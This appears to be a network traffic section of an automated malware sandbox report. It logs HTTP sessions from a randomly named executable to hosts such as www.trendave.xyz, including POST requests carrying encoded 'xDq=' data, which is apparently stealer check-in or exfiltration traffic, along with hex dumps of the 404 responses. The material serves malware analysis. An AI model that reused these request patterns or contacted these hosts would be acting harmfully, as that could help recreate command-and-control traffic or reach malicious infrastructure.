xDq=JJryUhO0gmql2tpZ3vL/0x8E2S1889h/madlAWCLevTrzkC4MCrlvUXG9rH3h6oE2PVSwSNWfSiMRsbNGPasmbBHLME6XHW8o+nMnQMmAvwnDL1+8QrsEBkW60wgADbLRUMaOYuYhlTw68dbkpmap37Yk9QktLUJr30CJ2/xeL83G/zIUBIskzMW5MDzMCnfUWY1shTbjJa2s0gStZEoL9vBgxCjAMmg9gCGYvbf2MnxYK+rJtpanqklGE2wvnTjPWnKOMzr3qXL7QoTkx2WnzOQiP2UYAAfpdW5k0HyQJqhqCRtSapW/d6lkT1rWXPI2BB4mn1ONdnH7JMnsksI7VCt/nxnpq1UVBCGOsfFLAhrL6fLnd4mR+s4dpCiz8CaSdb2K/rQihZmycwbQ/Rhi0F/lt8LTUojQMNKBAWmpqG/NM9crnF3E6SnSB5k3GVSVCW8YBU25oXKr86RWoMAoDSB9+mkvf5MzG+b19yO+Ql2SaDyVSQk+wie2GD2XC5tt/hNVeiAOF816TsGbkP0UWNkPF9bKtbSD+Nysz2q+QTJcPFiU86wb+qr3w6srXDK99aDDiPVTR3TIEQn3cdIh5RZdXdEg6A+AqBvgbm1ful71eIv8bZZGk7a1fPBT2RFgQjaF3I18dvop/J1fEf/qc+p9mkp98SeAc/ZTG9Y3rhkTCoJXm6zERN2RPGktjKGyUWTopWiwJE1fAkoZoqkbYezdFsaIpLgLnFgrX3G6R4TA3qL335Ad5ZnR3b+kTkjpPPfkxCXb7L+gb2AZbCSiiJKiPMiT+0cjxjEpzYiMZzwurYP8NQo7MQ7b7lkKC50vbBxziTqS8vinnsbJ2A/0TfGQbafXFR/feNqxiJ3uoyGMMtkz3OSWKsPPp1yKoG+PGAJ9h8pVQRYqngImBkuSrX9boMTlwdhE6noILiSY7gILDl9xnqpm2m+xrkoNhJWIBTGqXG8PCuKPbrBWLMtK5R7WivARRt3f9B6Ce1xp7FglQHP [TRUNCATED]
Nov 20, 2024 04:20:12.965291977 CET	279	IN	HTTP/1.1 404 Not Found content-type: text/html cache-control: private, no-cache, max-age=0 pragma: no-cache date: Wed, 20 Nov 2024 03:20:12 GMT server: LiteSpeed content-encoding: gzip vary: Accept-Encoding transfer-encoding: chunked connection: close Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a Data Ascii: a
Nov 20, 2024 04:20:12.965357065 CET	713	IN	Data Raw: 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e Data Ascii: 2bdeTkk0^M'va;fc6[u')]I\|ut9W?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqfw6@!Edt,CH4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	64847	108.181.189.7	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:20:14.972754002 CET	469	OUT	GET /lvda/?Lhx=fPAh7htHyFPl-&xDq=ELDSXX2RsHX+gMhA2PfNyBEKowNIoqU7uMJ0P3epR9C3wBGcH3Oc/iCy84j3rr0M4JJUpyIPXVKNA8OpCuWYmMQdGJQpdXCyyNvs5R5nS90nKpkFpzjMZ1A= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.jalan2.online User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Nov 20, 2024 04:20:15.808782101 CET	1236	IN	HTTP/1.1 404 Not Found content-type: text/html cache-control: private, no-cache, max-age=0 pragma: no-cache content-length: 1249 date: Wed, 20 Nov 2024 03:20:15 GMT server: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, [TRUNCATED]
Nov 20, 2024 04:20:15.808825970 CET	224	IN	Data Raw: 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c Data Ascii: 3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	64848	203.161.42.73	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:20:20.911335945 CET	730	OUT	POST /nhcb/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 200 Host: www.trendave.xyz Origin: http://www.trendave.xyz Referer: http://www.trendave.xyz/nhcb/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 45 76 58 6b 43 69 62 37 69 33 61 66 67 65 33 52 71 6e 43 5a 4d 35 69 62 43 6f 33 30 6c 72 52 6b 76 52 58 4c 74 5a 4c 42 56 57 41 75 68 74 5a 6e 6c 4c 32 51 4d 67 55 41 6f 46 47 7a 45 63 4c 75 44 35 6b 77 58 4e 44 31 4e 4d 30 37 64 4b 72 4b 4e 59 67 35 47 53 6e 2f 67 46 4f 68 75 74 56 67 6d 31 76 4a 7a 46 43 43 69 6f 79 4f 78 44 66 6e 58 4d 50 54 58 59 4b 51 50 6d 41 67 52 72 62 71 49 43 50 4b 45 45 46 6d 2f 69 77 36 48 41 33 6e 7a 39 6f 38 6e 6b 2f 44 4d 42 70 46 31 5a 71 48 52 4c 34 35 62 7a 4e 62 43 78 65 6e 42 6b 6a 50 51 68 4f 4b 55 75 58 47 36 70 75 6e 46 6d 6b 52 76 77 3d 3d Data Ascii: xDq=EvXkCib7i3afge3RqnCZM5ibCo30lrRkvRXLtZLBVWAuhtZnlL2QMgUAoFGzEcLuD5kwXND1NM07dKrKNYg5GSn/gFOhutVgm1vJzFCCioyOxDfnXMPTXYKQPmAgRrbqICPKEEFm/iw6HA3nz9o8nk/DMBpF1ZqHRL45bzNbCxenBkjPQhOKUuXG6punFmkRvw==
Nov 20, 2024 04:20:21.499918938 CET	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 20 Nov 2024 03:20:21 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Nov 20, 2024 04:20:21.499964952 CET	1236	IN	Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
Nov 20, 2024 04:20:21.500003099 CET	1236	IN	Data Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
Nov 20, 2024 04:20:21.500058889 CET	1236	IN	Data Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
Nov 20, 2024 04:20:21.500093937 CET	1236	IN	Data Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32 Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
Nov 20, 2024 04:20:21.500129938 CET	1236	IN	Data Raw: 35 31 2c 31 2e 35 32 31 36 35 20 30 2e 32 32 32 39 39 2c 31 2e 30 36 35 37 39 20 30 2e 31 34 39 33 33 2c 30 2e 36 30 39 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c Data Ascii: 51,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4533" d=
Nov 20, 2024 04:20:21.500164032 CET	1236	IN	Data Raw: 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 Data Ascii: ke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43796 -0.05891,45
Nov 20, 2024 04:20:21.500194073 CET	108	IN	Data Raw: 2c 32 36 2e 37 30 30 33 33 20 2d 32 2e 32 39 38 33 39 34 2c 36 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39 Data Ascii: ,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.0660
Nov 20, 2024 04:20:21.500228882 CET	1236	IN	Data Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
Nov 20, 2024 04:20:21.500263929 CET	1236	IN	Data Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
Nov 20, 2024 04:20:21.505523920 CET	1236	IN	Data Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	64849	203.161.42.73	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:20:23.465034008 CET	750	OUT	POST /nhcb/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 220 Host: www.trendave.xyz Origin: http://www.trendave.xyz Referer: http://www.trendave.xyz/nhcb/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 45 76 58 6b 43 69 62 37 69 33 61 66 78 50 6e 52 74 45 71 5a 62 4a 69 63 48 6f 33 30 75 4c 52 67 76 52 4c 4c 74 59 4f 5a 56 6b 55 75 6d 49 6c 6e 6b 4f 43 51 66 51 55 41 37 46 47 32 4a 38 4b 67 44 35 67 4f 58 49 44 31 4e 4d 67 37 64 4f 76 4b 4f 76 30 32 48 43 6e 35 68 31 4f 76 71 74 56 67 6d 31 76 4a 7a 46 47 34 69 6f 61 4f 78 7a 50 6e 52 6f 6a 53 65 34 4b 54 65 6d 41 67 56 72 62 75 49 43 4f 5a 45 42 64 49 2f 68 49 36 48 43 2f 6e 77 76 41 39 6f 6b 2f 46 49 42 6f 35 78 6f 48 39 55 2b 46 66 63 79 6c 6b 4d 67 43 30 4e 43 75 56 42 51 76 64 47 75 7a 31 6e 75 6e 54 49 6c 5a 59 30 2f 50 4c 30 70 62 58 71 31 64 34 76 56 4d 6c 47 67 77 72 41 52 45 3d Data Ascii: xDq=EvXkCib7i3afxPnRtEqZbJicHo30uLRgvRLLtYOZVkUumIlnkOCQfQUA7FG2J8KgD5gOXID1NMg7dOvKOv02HCn5h1OvqtVgm1vJzFG4ioaOxzPnRojSe4KTemAgVrbuICOZEBdI/hI6HC/nwvA9ok/FIBo5xoH9U+FfcylkMgC0NCuVBQvdGuz1nunTIlZY0/PL0pbXq1d4vVMlGgwrARE=
Nov 20, 2024 04:20:24.057552099 CET	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 20 Nov 2024 03:20:23 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Nov 20, 2024 04:20:24.057590008 CET	224	IN	Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
Nov 20, 2024 04:20:24.057625055 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 Data Ascii: style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263.51309 c -90.20375,-0.0994 -119.20375,-0.0994 -119.20375,-0.09
Nov 20, 2024 04:20:24.057657957 CET	1236	IN	Data Raw: 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 34 39 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 Data Ascii: ;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914603,-0.23621 -3.505591,1.17801 -4.861444,2.68113 -1.355853,1.5
Nov 20, 2024 04:20:24.057689905 CET	1236	IN	Data Raw: 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 31 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 37 34 2e 36 38 37 35 2c 31 32 35 2e 30 33 37 Data Ascii: ;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433 -18.781379,20.01048 -5.583823,6.66719 -10.749655,13.66605 -13.
Nov 20, 2024 04:20:24.057723999 CET	672	IN	Data Raw: 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a Data Ascii: #000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.22912 11.6978
Nov 20, 2024 04:20:24.057755947 CET	1236	IN	Data Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20 Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
Nov 20, 2024 04:20:24.057790995 CET	1236	IN	Data Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32 Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
Nov 20, 2024 04:20:24.057822943 CET	448	IN	Data Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
Nov 20, 2024 04:20:24.057859898 CET	1236	IN	Data Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
